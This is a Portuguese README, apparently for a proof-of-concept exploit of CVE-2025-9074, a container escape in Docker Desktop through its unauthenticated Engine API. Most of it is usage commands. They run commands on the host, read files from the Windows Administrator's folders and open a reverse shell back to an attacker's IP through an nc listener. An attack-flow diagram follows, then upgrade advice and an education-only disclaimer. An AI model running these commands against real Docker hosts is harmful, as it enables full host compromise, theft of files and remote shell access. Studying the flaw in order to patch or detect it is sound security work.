
Exploit de prova de conceito para CVE-2025-9074 - Escape de contêiner da API do Docker Engine não autenticado afetando Docker Desktop < 4.44.3 no Windows e macOS (CVSS 9.3)
Exploit de Prova de Conceito para CVE-2025-9074 - uma vulnerabilidade crítica de fuga de container no Docker Desktop que permite acesso não autenticado à API do Docker Engine.
| Propriedade | Valor |
|---|---|
| CVE ID | CVE-2025-9074 |
| Pontuação CVSS | 9.3 (Crítica) |
| Software Afetado | Docker Desktop < 4.44.3 |
| Plataformas Afetadas | Windows, macOS (Linux NÃO afetado) |
| Versão Corrigida | Docker Desktop 4.44.3+ |
| Descobridores | Felix Boulet, Philippe Dugré |
| Data da Descoberta | Meados de 2025 |
| Data do Patch | 20 de Agosto de 2025 |
A vulnerabilidade permite que containers em execução no Docker Desktop acessem a API do Docker Engine em http://192.168.65.7:2375 sem autenticação. Isso ocorre independentemente de:
A API do Docker Engine foi exposta em um socket TCP acessível de dentro dos containers, permitindo:
pip3 install requests
# Execute a command on the host
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "whoami"
# Read files from Windows host
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "cat /hostfs/mnt/c/Users/Administrator/Desktop/root.txt"
# List users on Windows
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "ls -la /hostfs/mnt/c/Users"
# Terminal 1: Set up listener
nc -lvnp 4444
# Terminal 2: Execute exploit
python3 exploit.py -u http://192.168.65.7:2375 -m reverse -l <YOUR_IP> -p 4444
# Once connected, host filesystem is at: /hostfs
# If you already have access to a container
curl http://192.168.65.7:2375/version
graph TD
A[Malicious Container] -->|No Auth Required| B[Docker Engine API<br/>192.168.65.7:2375]
B -->|Create Container| C[Privileged Container]
C -->|Mount Host FS| D[Full Host Access]
D -->|Read/Write| E[Compromise System]
Atualize para Docker Desktop 4.44.3 ou superior imediatamente.
# Check your Docker Desktop version
docker --version
# Update Docker Desktop
# Windows: Download from https://desktop.docker.com/win/main/amd64/Docker%20Desktop%20Installer.exe
# macOS: Download from https://desktop.docker.com/mac/main/amd64/Docker.dmg
Se a atualização imediata não for possível:
Esta ferramenta é fornecida apenas para fins educacionais e de teste de segurança autorizados.
Licença MIT - Consulte o arquivo LICENSE para detalhes